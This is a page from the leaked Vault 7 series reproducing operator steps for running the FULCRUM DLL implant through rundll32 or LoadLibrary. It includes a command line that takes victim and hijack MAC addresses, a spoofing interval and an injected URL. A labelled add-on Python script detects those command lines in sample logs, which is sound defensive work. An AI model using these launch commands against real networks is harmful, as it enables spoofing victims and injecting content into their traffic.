Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.
UNCLASSIFIED//LES
7.1.9 RUNNING FULCRUM AS A DLL USING RUNDLL32.EXE WITH A CONFIGURATION FILE
1. Prepare a configuration file as described in Section 7.1.1
2. Encrypt a configuration file as described in Section 7.1.3
3. Copy the FULCRUM DLL binary (f32.dll) into the same directory as the configuration file.
4. Open a command prompt
5. Change directories to the location of the FULCRUM binary.
6. Execute the binary by typing the following command into the command prompt:
rundll32.exe f32.dll,rundll_entry
7.1.10 RUNNING FULCRUM AS A DLL USING RUNDLL32.EXE WITH COMMAND LINE PARAMETERS
1. Copy the FULCRUM DLL binary (f32.dll) to the desired location.
2. Open a command prompt
3. Change directories to the location of the FULCRUM binary.
4. Execute the binary by typing the following command into the command prompt:
rundll32.exe f32.dll,rundll_entry [Victim MAC Address] [Hijack MAC Address] [Milliseconds between Spoofs] [Injected URL]
For example:
rundll32.exe f32.dll,rundll_entry AA:AA:AA:AA:AA:AA BB:BB:BB:BB:BB:BB 1000 http://test.com/cool.jpg
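A defender's view of the two rundll32.exe procedures above (Sections 7.1.9 and 7.1.10), as an added example that is not part of the original guide: a Python check over process-creation command lines that flags the rundll_entry export and, independently of any file or export name, the argument shape of two MAC addresses, an interval and a URL. The event records, host names, upd.dll and Start are constructed for illustration.

```python
import re

MAC = r"(?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2}"
# rundll32 [path\]file.dll,export [args]; quotes around either path are optional.
RUNDLL = re.compile(
    r'(?i)(?:^|[\\/\s"])rundll32(?:\.exe)?"?\s+"?(?P<dll>[^",]+?)"?\s*,\s*'
    r'(?P<export>[\w#]+)(?P<rest>.*)$')
# Argument shape from Section 7.1.10: two MACs, an interval in ms, a URL.
ARGS = re.compile(
    rf"\s*(?P<victim>{MAC})\s+(?P<hijack>{MAC})\s+(?P<ms>\d+)\s+(?P<url>\S+)\s*$")

def classify(cmdline):
    """Return a finding dict for a suspicious rundll32 command line, else None."""
    m = RUNDLL.search(cmdline)
    if not m:
        return None
    finding = {"dll": m["dll"].strip(), "export": m["export"]}
    args = ARGS.match(m["rest"])
    if args:
        # Flag the argument shape whatever the DLL or export is called,
        # since both names are trivially changed.
        finding.update(mode="command-line parameters",
                       victim_mac=args["victim"].upper(),
                       hijack_mac=args["hijack"].upper(),
                       interval_ms=int(args["ms"]), url=args["url"])
        return finding
    if m["export"].lower() == "rundll_entry":
        # Export name from the page with no parameters: the Section 7.1.9 form.
        bare = not m["rest"].strip()
        finding["mode"] = "configuration file" if bare else "unrecognised arguments"
        return finding
    return None

# Constructed process-creation records (host, command line); not real telemetry.
EVENTS = [
    ("ws-01", r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"),
    ("ws-02", r'"C:\Windows\System32\rundll32.exe" "C:\Users\Public\f32.dll",rundll_entry'),
    ("ws-03", "rundll32.exe f32.dll,rundll_entry AA:AA:AA:AA:AA:AA "
              "BB:BB:BB:BB:BB:BB 1000 http://test.com/cool.jpg"),
    # Hypothetical renamed DLL and export, same argument shape.
    ("ws-04", "rundll32 upd.dll,Start aa-aa-aa-aa-aa-01 bb-bb-bb-bb-bb-02 250 "
              "http://example.invalid/x.png"),
]

def hunt(events):
    """Return (host, finding) pairs for every flagged command line."""
    return [(host, f) for host, cmd in events if (f := classify(cmd))]

if __name__ == "__main__":
    for host, finding in hunt(EVENTS):
        print(host, finding)
```

The name match alone is a weak indicator; the extracted MAC addresses and URL are the fields worth correlating with ARP and proxy logs.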
7.1.11 RUNNING FULCRUM AS A DLL USING LOADLIBRARY WITH A CONFIGURATION FILE
1. Prepare a configuration file as described in Section 7.1.1
2. Encrypt a configuration file as described in Section 7.1.3
3. Copy the FULCRUM DLL binary (f32.dll or f64.dll) to the same directory as the configuration file.
4. From the parent process, load the binary using LoadLibrary
5. From the parent process, get the parameterless export using GetProcAddress(“func”). This function’s signature is: void func(void)
6. From the parent process, call func
7.1.12 RUNNING FULCRUM AS A DLL USING LOADLIBRARY WITH COMPILED PARAMETERS
1. Copy the FULCRUM DLL binary (f32.dll or f64.dll) to desired location.
2. From the parent process, load the binary using LoadLibrary
3. From the parent process, get the parameterless export using GetProcAddress(“func”). This function’s signature is: void func(void)
4. From the parent process, call func